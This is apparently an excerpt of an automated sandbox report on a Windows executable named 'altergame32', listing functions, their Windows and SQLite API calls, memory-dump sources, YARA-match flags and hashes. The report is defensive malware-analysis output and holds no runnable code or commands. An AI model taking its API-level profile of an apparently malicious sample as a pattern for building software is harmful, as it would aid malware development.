                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocCreateDestroyVersion
                                                                  • String ID:
                                                                  • API String ID: 2507506473-0
                                                                  • Opcode ID: 86f647c1e17f9121db62508107f35f7b6bb1c87a2647d7f3c89694d97ca3aca0
                                                                  • Instruction ID: 6792b556898a49359456169ba0c82f011abfeecbff717d74d0c7f117a7ac5838
                                                                  • Opcode Fuzzy Hash: 86f647c1e17f9121db62508107f35f7b6bb1c87a2647d7f3c89694d97ca3aca0
                                                                  • Instruction Fuzzy Hash: 90F065F0A01302DAEB206B70AE4572A3695DBC0755F20483BFA04F51E0EA788884A91D
                                                                  Function 004025F5 Relevance: 2.6, APIs: 2, Instructions: 66sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastSleep
                                                                  • String ID:
                                                                  • API String ID: 1458359878-0
                                                                  • Opcode ID: 16b1333c6e2be3bb346ae0c34aa2f746fa4c3e66eb76d0f189a2250a68af3eb4
                                                                  • Instruction ID: 111d6632d5b9c242e9fc9679db8046095268ab7c5413e818d62677c6d9c37380
                                                                  • Opcode Fuzzy Hash: 16b1333c6e2be3bb346ae0c34aa2f746fa4c3e66eb76d0f189a2250a68af3eb4
                                                                  • Instruction Fuzzy Hash: 9411E7719046019BEB188F64DA99B7B3BA0AF04314F14413BF907AE2C1C779CA86DB4A
                                                                  Function 0040D090 Relevance: 2.6, APIs: 2, Instructions: 55sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastSleep
                                                                  • String ID:
                                                                  • API String ID: 1458359878-0
                                                                  • Opcode ID: e234ee99e1e794852f87d0e5227e47b7c3f12decf1720d858daf55902e207e4c
                                                                  • Instruction ID: 9e2917bad73b05df65526e13dc98655dc28116d46e1899a2a9a3aae13cf9c72c
                                                                  • Opcode Fuzzy Hash: e234ee99e1e794852f87d0e5227e47b7c3f12decf1720d858daf55902e207e4c
                                                                  • Instruction Fuzzy Hash: B6019B71A046119BDB188F64DE99B7A3BA0AF04314F14453BF507EE2D0C779C985DB49
                                                                  Function 02E45119 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 02E4511E
                                                                    • Part of subcall function 02E43D7E: htons.WS2_32(?), ref: 02E43DA2
                                                                    • Part of subcall function 02E43D7E: htonl.WS2_32(00000000), ref: 02E43DB9
                                                                    • Part of subcall function 02E43D7E: htonl.WS2_32(00000000), ref: 02E43DC0
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: htonl$H_prologhtons
                                                                  • String ID:
                                                                  • API String ID: 4039807196-0
                                                                  • Opcode ID: 2e09034d8719b4f6dce5a19d7770802977255da8bcf2b3ef66e4ddc0de95370e
                                                                  • Instruction ID: 4ecb66520e8f040e8d4b5e2ef508e5adda9abb8a8e9a06650a063ee6fc14c920
                                                                  • Opcode Fuzzy Hash: 2e09034d8719b4f6dce5a19d7770802977255da8bcf2b3ef66e4ddc0de95370e
                                                                  • Instruction Fuzzy Hash: D8814872D8424ECFCF15DFA8E090AEEBBB5AF48214F14916AE850B7240EB755A05CF64
                                                                  Function 02EA10FF Relevance: 1.7, APIs: 1, Instructions: 166fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteFileA.KERNEL32(5193289A,?,?,?), ref: 02ED30F3
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E7A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E7A000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e7a000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID:
                                                                  • API String ID: 4033686569-0
                                                                  • Opcode ID: 1436e2c2cd006d6dd6450ccdee363d2038d2b47cd0793f19acdc30a5ae073239
                                                                  • Instruction ID: 0b23120f8d352db3ef11cf7f362516cd92965ae63f730a9c92f0900960a03ac3
                                                                  • Opcode Fuzzy Hash: 1436e2c2cd006d6dd6450ccdee363d2038d2b47cd0793f19acdc30a5ae073239
                                                                  • Instruction Fuzzy Hash: 25518CF250C200AFE705AF19DC8577ABBE5EFC8720F06892DE6C583644DA359851CB93
                                                                  Function 02E4E9C0 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 02E4E9C5
                                                                    • Part of subcall function 02E41A01: TlsGetValue.KERNEL32 ref: 02E41A0A
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: H_prologValue
                                                                  • String ID:
                                                                  • API String ID: 3700342317-0
                                                                  • Opcode ID: 1ddaec3a645ff924805f38c462467a57b611f1e12e8107a3cdbcbea68bb7b2c6
                                                                  • Instruction ID: a6ff3c2bddca505efa59f41d4746dedd9d663357a4932843fe51a715c5dee66d
                                                                  • Opcode Fuzzy Hash: 1ddaec3a645ff924805f38c462467a57b611f1e12e8107a3cdbcbea68bb7b2c6
                                                                  • Instruction Fuzzy Hash: 4E2151B1944209AFDF00DF95E440AFEBBF9FF48314F14905EE904A7240DB70AA04DBA1
                                                                  Function 02E433B2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02E433CC
                                                                    • Part of subcall function 02E432AB: __EH_prolog.LIBCMT ref: 02E432B0
                                                                    • Part of subcall function 02E432AB: RtlEnterCriticalSection.NTDLL(?), ref: 02E432C3
                                                                    • Part of subcall function 02E432AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02E432EF
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                  • String ID:
                                                                  • API String ID: 1518410164-0
                                                                  • Opcode ID: a4af0ff6fad89dcf47329c35108f14d2b4edff424fa5e900a9e6c358125affa2
                                                                  • Instruction ID: b705f3e765df5185e820b6a9570f4a409e6d68e5e29aca65902679d4c330d7ce
                                                                  • Opcode Fuzzy Hash: a4af0ff6fad89dcf47329c35108f14d2b4edff424fa5e900a9e6c358125affa2
                                                                  • Instruction Fuzzy Hash: 93014071654606AFDB04DF59E885F55BBA9FF45324B20C35AE928872C0EF70EC21CBA4
                                                                  Function 02E4E550 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 02E4E555
                                                                    • Part of subcall function 02E426DB: RtlEnterCriticalSection.NTDLL(?), ref: 02E42706
                                                                    • Part of subcall function 02E426DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02E4272B
                                                                    • Part of subcall function 02E426DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02E65B53), ref: 02E42738
                                                                    • Part of subcall function 02E426DB: SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02E42778
                                                                    • Part of subcall function 02E426DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02E427D9
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                  • String ID:
                                                                  • API String ID: 4293676635-0
                                                                  • Opcode ID: 79d52e2c4da552d2142098393e8d572a3f7f4e8e5c27b4872d5a6e1e1d14aea6
                                                                  • Instruction ID: c38155c0bea1a3361e868da9338a9eb55fa62b023b9e789ed4f97c30e56c3ab7
                                                                  • Opcode Fuzzy Hash: 79d52e2c4da552d2142098393e8d572a3f7f4e8e5c27b4872d5a6e1e1d14aea6
                                                                  • Instruction Fuzzy Hash: 5B01D0B0A90B048FC718CF0AC54899AFBF4EF88700B05C5AE94498B321E770AA40CF90
                                                                  Function 00402332 Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: LocalTime
                                                                  • String ID:
                                                                  • API String ID: 481472006-0
                                                                  • Opcode ID: d458c72378841d57a281c4db5a90640847ee0df62826f8d8c8b7ba3dbbe90e0b
                                                                  • Instruction ID: 9af1d715428bb10e0452cb367a8199cfa5a1ac560f54e1c53b8f875cbd80c69b
                                                                  • Opcode Fuzzy Hash: d458c72378841d57a281c4db5a90640847ee0df62826f8d8c8b7ba3dbbe90e0b
                                                                  • Instruction Fuzzy Hash: 08F0F676D25256CDC3149BB86F112E57BF0A646B20754033BD893B20E2C7344949EB1E
                                                                  Function 0040DC42 Relevance: 1.5, APIs: 1, Instructions: 33registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders), ref: 0040DC62
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                  • Opcode ID: b1caeba748d88131af362526e9eb5d2cedac4dbb86ea276f4220029156935f02
                                                                  • Instruction ID: f8c3724f754cfcc94ef41bc6c10cfa097af13215f723e54c64c92e4290f33e94
                                                                  • Opcode Fuzzy Hash: b1caeba748d88131af362526e9eb5d2cedac4dbb86ea276f4220029156935f02
                                                                  • Instruction Fuzzy Hash: F4F02E31E04616CBE7108FA1D9841A9F723BB5130476046BFD851A3284E339944EDB48
                                                                  Function 0040D8E0 Relevance: 1.5, APIs: 1, Instructions: 27libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 58385ccaa7b7034decbcb582908fb41edbfb6e48ea1f767cd773899efa36b1c6
                                                                  • Instruction ID: 24ab9ea8706f183bf36089ca0671f6bd679c7bc8bd1ec4c941c05a3988f0b299
                                                                  • Opcode Fuzzy Hash: 58385ccaa7b7034decbcb582908fb41edbfb6e48ea1f767cd773899efa36b1c6
                                                                  • Instruction Fuzzy Hash: F3F0A938A04203CFDB00CE99D9C0BA633E0BB58780B50406ADC02EB388D378D5028E99
                                                                  Function 0040D195 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D7B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: ManagerOpen
                                                                  • String ID:
                                                                  • API String ID: 1889721586-0
                                                                  • Opcode ID: 1f3cd9f2903824330797f64285bbd9b8ac78e1855b66ca3c743892f81974d4d0
                                                                  • Instruction ID: bcc538560c25e25718ea8e5d329da63500f38517310f8df8015202c046b36953
                                                                  • Opcode Fuzzy Hash: 1f3cd9f2903824330797f64285bbd9b8ac78e1855b66ca3c743892f81974d4d0
                                                                  • Instruction Fuzzy Hash: 33E0DF308061528AD3084FA06BA00603B60E909721310047FC083B54F2D63C4A46EB2A
                                                                  Function 02E4E32F Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 02E4E334
                                                                    • Part of subcall function 02E53B4C: _malloc.LIBCMT ref: 02E53B64
                                                                    • Part of subcall function 02E4E550: __EH_prolog.LIBCMT ref: 02E4E555
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: H_prolog$_malloc
                                                                  • String ID:
                                                                  • API String ID: 4254904621-0
                                                                  • Opcode ID: 379fab7afca3416c06a8651ffa92af2982ddf3d22465154f5ba2be20cafbd564
                                                                  • Instruction ID: ab2b7f4b5d730f3a2a0d6bf643a55856edb3fbe60cfea4d53f0d607e5be0d093
                                                                  • Opcode Fuzzy Hash: 379fab7afca3416c06a8651ffa92af2982ddf3d22465154f5ba2be20cafbd564
                                                                  • Instruction Fuzzy Hash: 2CE0C271AD0205ABCF0DEF68E81173EB7A6EB04744F04D5ADB809D2340EF7089008B44
                                                                  Function 02E53452 Relevance: 1.5, APIs: 1, Instructions: 19COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 02E55C5A: __getptd_noexit.LIBCMT ref: 02E55C5B
                                                                    • Part of subcall function 02E55C5A: __amsg_exit.LIBCMT ref: 02E55C68
                                                                    • Part of subcall function 02E53493: __getptd_noexit.LIBCMT ref: 02E53497
                                                                    • Part of subcall function 02E53493: __freeptd.LIBCMT ref: 02E534B1
                                                                    • Part of subcall function 02E53493: RtlExitUserThread.NTDLL(?,00000000,?,02E53473,00000000), ref: 02E534BA
                                                                  • __XcptFilter.LIBCMT ref: 02E5347F
                                                                    • Part of subcall function 02E58D94: __getptd_noexit.LIBCMT ref: 02E58D98
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                  • String ID:
                                                                  • API String ID: 1405322794-0
                                                                  • Opcode ID: be4c7acc83ee84a92e92717ee1f3401ea792331664997956a3b05afe9298d8e6
                                                                  • Instruction ID: 93a8d1cb4e2f04bca63dee6452d15d3af62e60f1bd6892304c078fdd33e8ac62
                                                                  • Opcode Fuzzy Hash: be4c7acc83ee84a92e92717ee1f3401ea792331664997956a3b05afe9298d8e6
                                                                  • Instruction Fuzzy Hash: 51E0ECB59906109FEB08EBE0D849F6D77AAAF05701F209098F502AB261DA74A940DF20
                                                                  Function 004028F0 Relevance: 1.5, APIs: 1, Instructions: 15registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 6986c9eefc83e51a25370ac1a3e60436c139926f161bcfc0030a1d8b7de223a1
                                                                  • Instruction ID: f31876c6c4c0f138cccee9462a0086245c419a974d7cab85ff81069ee65e3e82
                                                                  • Opcode Fuzzy Hash: 6986c9eefc83e51a25370ac1a3e60436c139926f161bcfc0030a1d8b7de223a1
                                                                  • Instruction Fuzzy Hash: E5D0A77080460893DF240B305A5CCE677F0A715301B615472D181741E1C7B94645A76D
                                                                  Function 00402247 Relevance: 1.5, APIs: 1, Instructions: 8fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: CopyFile
                                                                  • String ID:
                                                                  • API String ID: 1304948518-0
                                                                  • Opcode ID: 0a848a0bc4f9794f60dd0c3c1d8d599b53582c9a33dd7429fb53a4b9a79c8d04
                                                                  • Instruction ID: e53e838d189e15d1a88c58be6bb062d1bba2abba8716db84d0347d729f9f21c2
                                                                  • Opcode Fuzzy Hash: 0a848a0bc4f9794f60dd0c3c1d8d599b53582c9a33dd7429fb53a4b9a79c8d04
                                                                  • Instruction Fuzzy Hash: 7FB09230908108CBC2188A508B4C6F6777C5704780B2651FB950BB10E0DB7C9A4EB91F
                                                                  Function 004026B8 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectory
                                                                  • String ID:
                                                                  • API String ID: 4241100979-0
                                                                  • Opcode ID: 4e171e566df61bc11b155f3428819f5ad54eaba0083f16c23a33ef502eef1c3c
                                                                  • Instruction ID: 622b69b224c93727709cec0e4232e9ca8028897ae25a3fec4193af00d866e9b4
                                                                  • Opcode Fuzzy Hash: 4e171e566df61bc11b155f3428819f5ad54eaba0083f16c23a33ef502eef1c3c
                                                                  • Instruction Fuzzy Hash: 86B0122094D012F6D00122C00D04D6B293C1915398B3141337107700C105BC000FB67F
                                                                  Function 02E52160 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 02E51610: OpenEventA.KERNEL32(00100002,00000000,00000000,F6639BC4), ref: 02E516B0
                                                                    • Part of subcall function 02E51610: CloseHandle.KERNEL32(00000000), ref: 02E516C5
                                                                    • Part of subcall function 02E51610: ResetEvent.KERNEL32(00000000,F6639BC4), ref: 02E516CF
                                                                    • Part of subcall function 02E51610: CloseHandle.KERNEL32(00000000,F6639BC4), ref: 02E51704
                                                                  • TlsSetValue.KERNEL32(00000028,?), ref: 02E521AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseEventHandle$OpenResetValue
                                                                  • String ID:
                                                                  • API String ID: 1556185888-0
                                                                  • Opcode ID: 3b9b28eafe417fc6c567481bc5014b41513ee904ed75b7ae1bac4107a637e6e8
                                                                  • Instruction ID: dfe169f3091b49f4fbbf6b600976f7f82a4897bb37878ec765eaeeb9ec6c2395
                                                                  • Opcode Fuzzy Hash: 3b9b28eafe417fc6c567481bc5014b41513ee904ed75b7ae1bac4107a637e6e8
                                                                  • Instruction Fuzzy Hash: 0301A271A94214AFD710CF69DC09B5ABBA8FB056B4F108B6AF825D3380D77569108BA0
                                                                  Function 0040D402 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000), ref: 0040D404
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: d2199ccd38951a2228f4690c2bb14869746e9adfcd46edbeab367d5f72275205
                                                                  • Instruction ID: 1128adf815e116da34b669ea7842f0fee9a422ad02bf30eda05eda9f0811fc53
                                                                  • Opcode Fuzzy Hash: d2199ccd38951a2228f4690c2bb14869746e9adfcd46edbeab367d5f72275205
                                                                  • Instruction Fuzzy Hash: 7BC08C31C08212EFEA404B908A487187AA4AB08709F150061EA85B2280C2B80828EBE9
                                                                  Function 0040233A Relevance: 1.3, APIs: 1, Instructions: 6sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 4b1c864105606ac8e99e9f5613e34887e3b99aeb5aa06c5b01fb020e8278d748
                                                                  • Instruction ID: f0c6549872d860ea028944903253f61ce079030b04137f1852cf427867728f85
                                                                  • Opcode Fuzzy Hash: 4b1c864105606ac8e99e9f5613e34887e3b99aeb5aa06c5b01fb020e8278d748
                                                                  • Instruction Fuzzy Hash: D3B01231948700D6D6402BA0BF0DF1036307704700F20413BA34A344E086FD1409BB0F
                                                                  Function 0040DBC2 Relevance: 1.3, APIs: 1, Instructions: 3stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 1586166983-0
                                                                  • Opcode ID: 2866c08ac9b87989cc392699c312b0709f7a9addcb088bca7ad9bd041635be8a
                                                                  • Instruction ID: 152760751094682eaf5c06a675cbf44d7ff1935ba39f90d314b64f28574f5972
                                                                  • Opcode Fuzzy Hash: 2866c08ac9b87989cc392699c312b0709f7a9addcb088bca7ad9bd041635be8a
                                                                  • Instruction Fuzzy Hash: 87900221604101DEE2001B735E0821525946604651312887D5453E1150DA3880095529

                                                                  Non-executed Functions

                                                                  Function 6096748C Relevance: 131.0, APIs: 72, Strings: 2, Instructions: 1504COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                                    • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                    • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                    • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                    • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                  • sqlite3_step.SQLITE3 ref: 6096755A
                                                                  • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                                  • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                                  • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                                  • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                                  • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                                  • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                                  • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                                  • sqlite3_step.SQLITE3 ref: 609679C3
                                                                  • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                                  • sqlite3_step.SQLITE3 ref: 60967AB4
                                                                  • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                                  • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                                  • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                                  • sqlite3_step.SQLITE3 ref: 60967B94
                                                                  • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                                  • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                                  • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                                  • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                                  • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                                    • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                                  • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                                  • sqlite3_step.SQLITE3 ref: 60967C7D
                                                                  • memcmp.MSVCRT ref: 60967D4C
                                                                  • sqlite3_free.SQLITE3 ref: 60967D69
                                                                  • sqlite3_free.SQLITE3 ref: 60967D74
                                                                  • sqlite3_free.SQLITE3 ref: 60967FF7
                                                                  • sqlite3_free.SQLITE3 ref: 60968002
                                                                    • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                    • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                    • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                    • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                    • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                  • sqlite3_reset.SQLITE3 ref: 60967C93
                                                                    • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                    • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                  • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                                  • sqlite3_reset.SQLITE3 ref: 60968035
                                                                  • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                                    • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                  • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                                  • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                                  • sqlite3_step.SQLITE3 ref: 609680D1
